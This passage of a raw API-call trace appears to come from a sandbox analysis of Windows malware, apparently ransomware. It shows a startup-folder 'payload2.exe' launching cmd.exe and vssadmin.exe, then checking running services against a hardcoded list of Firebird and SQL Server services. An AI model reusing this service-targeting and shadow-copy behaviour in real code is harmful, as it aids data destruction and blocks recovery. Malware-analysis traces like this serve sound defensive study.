th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0052.885] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0052.885] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0052.886] lstrlenW (lpString="developing.exe") returned 14 [0052.886] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0052.906] lstrlenW (lpString="supported.exe") returned 13 [0052.906] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0052.907] lstrlenW (lpString="girlstionselect.exe") returned 19 [0052.907] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0052.908] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0052.908] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0052.909] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0052.909] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0052.909] lstrlenW (lpString="eating.exe") returned 10 [0052.909] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0052.910] lstrlenW (lpString="nh_protected.exe") returned 16 [0052.910] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0052.912] lstrlenW (lpString="vulnerability.exe") returned 17 [0052.912] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0052.913] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0052.913] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0052.914] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0052.914] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0052.914] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0052.914] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0052.916] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0052.916] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0052.917] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0052.917] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0052.918] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0052.918] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0052.918] lstrlenW (lpString="cmd.exe") returned 7 [0052.918] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.919] lstrlenW (lpString="conhost.exe") returned 11 [0052.919] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0052.923] lstrlenW (lpString="vssadmin.exe") returned 12 [0052.923] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0052.924] lstrlenW (lpString="VSSVC.exe") returned 9 [0052.924] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.925] lstrlenW (lpString="svchost.exe") returned 11 [0052.925] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0052.926] CloseHandle (hObject=0x1ac) returned 1 [0052.926] Sleep (dwMilliseconds=0x1f4) [0053.477] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x680328 [0053.478] EnumServicesStatusExW (in: hSCManager=0x680328, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0053.478] GetLastError () returned 0xea [0053.478] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0053.478] EnumServicesStatusExW (in: hSCManager=0x680328, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0053.479] CloseServiceHandle (hSCObject=0x680328) returned 1 [0053.479] lstrlenW (lpString="Appinfo") returned 7 [0053.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0053.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0053.479] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0053.479] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0053.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0053.479] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0053.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.479] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0053.479] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0053.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0053.479] lstrlenW (lpString="AudioSrv") returned 8 [0053.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0053.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0053.479] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0053.479] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0053.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0053.479] lstrlenW (lpString="BFE") returned 3 [0053.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0053.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0053.479] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0053.480] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0053.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0053.480] lstrlenW (lpString="CryptSvc") returned 8 [0053.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0053.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0053.480] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0053.480] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0053.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0053.480] lstrlenW (lpString="CscService") returned 10 [0053.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0053.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0053.480] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0053.480] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0053.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0053.480] lstrlenW (lpString="DcomLaunch") returned 10 [0053.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.480] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0053.480] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0053.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0053.480] lstrlenW (lpString="Dhcp") returned 4 [0053.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0053.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0053.480] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0053.480] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0053.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0053.480] lstrlenW (lpString="Dnscache") returned 8 [0053.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0053.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0053.480] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0053.480] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0053.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0053.480] lstrlenW (lpString="DPS") returned 3 [0053.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0053.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0053.480] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0053.480] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0053.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0053.481] lstrlenW (lpString="eventlog") returned 8 [0053.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0053.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0053.481] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0053.481] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0053.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0053.481] lstrlenW (lpString="EventSystem") returned 11 [0053.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0053.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0053.481] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0053.481] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0053.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0053.481] lstrlenW (lpString="gpsvc") returned 5 [0053.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0053.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0053.481] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0053.481] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0053.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0053.481] lstrlenW (lpString="iphlpsvc") returned 8 [0053.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.481] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0053.481] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0053.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0053.481] lstrlenW (lpString="LanmanServer") returned 12 [0053.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0053.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0053.481] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0053.481] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0053.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0053.481] lstrlenW (lpString="LanmanWorkstation") returned 17 [0053.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.481] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0053.481] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0053.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0053.481] lstrlenW (lpString="lmhosts") returned 7 [0053.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0053.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0053.482] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0053.482] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0053.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0053.482] lstrlenW (lpString="MMCSS") returned 5 [0053.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0053.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0053.482] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0053.482] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0053.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0053.482] lstrlenW (lpString="MpsSvc") returned 6 [0053.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0053.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0053.482] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0053.482] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0053.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0053.482] lstrlenW (lpString="Netman") returned 6 [0053.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0053.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0053.482] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0053.482] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0053.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0053.482] lstrlenW (lpString="netprofm") returned 8 [0053.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0053.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0053.482] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0053.482] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0053.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0053.482] lstrlenW (lpString="NlaSvc") returned 6 [0053.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0053.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0053.482] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0053.482] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0053.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0053.482] lstrlenW (lpString="nsi") returned 3 [0053.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0053.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0053.482] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0053.483] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0053.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0053.483] lstrlenW (lpString="PcaSvc") returned 6 [0053.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0053.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0053.483] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0053.483] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0053.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0053.483] lstrlenW (lpString="PlugPlay") returned 8 [0053.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0053.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0053.483] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0053.483] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0053.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0053.483] lstrlenW (lpString="Power") returned 5 [0053.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0053.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0053.483] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0053.483] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0053.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0053.483] lstrlenW (lpString="ProfSvc") returned 7 [0053.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0053.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0053.483] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0053.483] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0053.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0053.483] lstrlenW (lpString="RpcEptMapper") returned 12 [0053.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.483] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0053.483] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0053.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0053.483] lstrlenW (lpString="RpcSs") returned 5 [0053.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0053.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0053.483] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0053.483] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0053.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0053.483] lstrlenW (lpString="SamSs") returned 5 [0053.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0053.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0053.484] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0053.484] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0053.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0053.484] lstrlenW (lpString="Schedule") returned 8 [0053.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0053.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0053.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0053.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0053.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0053.484] lstrlenW (lpString="SENS") returned 4 [0053.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0053.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0053.484] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0053.484] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0053.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0053.484] lstrlenW (lpString="ShellHWDetection") returned 16 [0053.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.484] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0053.484] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0053.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0053.484] lstrlenW (lpString="Spooler") returned 7 [0053.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0053.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0053.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0053.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0053.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0053.484] lstrlenW (lpString="swprv") returned 5 [0053.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0053.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0053.484] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0053.484] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0053.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0053.484] lstrlenW (lpString="SysMain") returned 7 [0053.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0053.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0053.485] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0053.485] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0053.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0053.485] lstrlenW (lpString="Themes") returned 6 [0053.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0053.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0053.485] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0053.485] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0053.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0053.485] lstrlenW (lpString="TrkWks") returned 6 [0053.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0053.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0053.485] lstrcmpiW 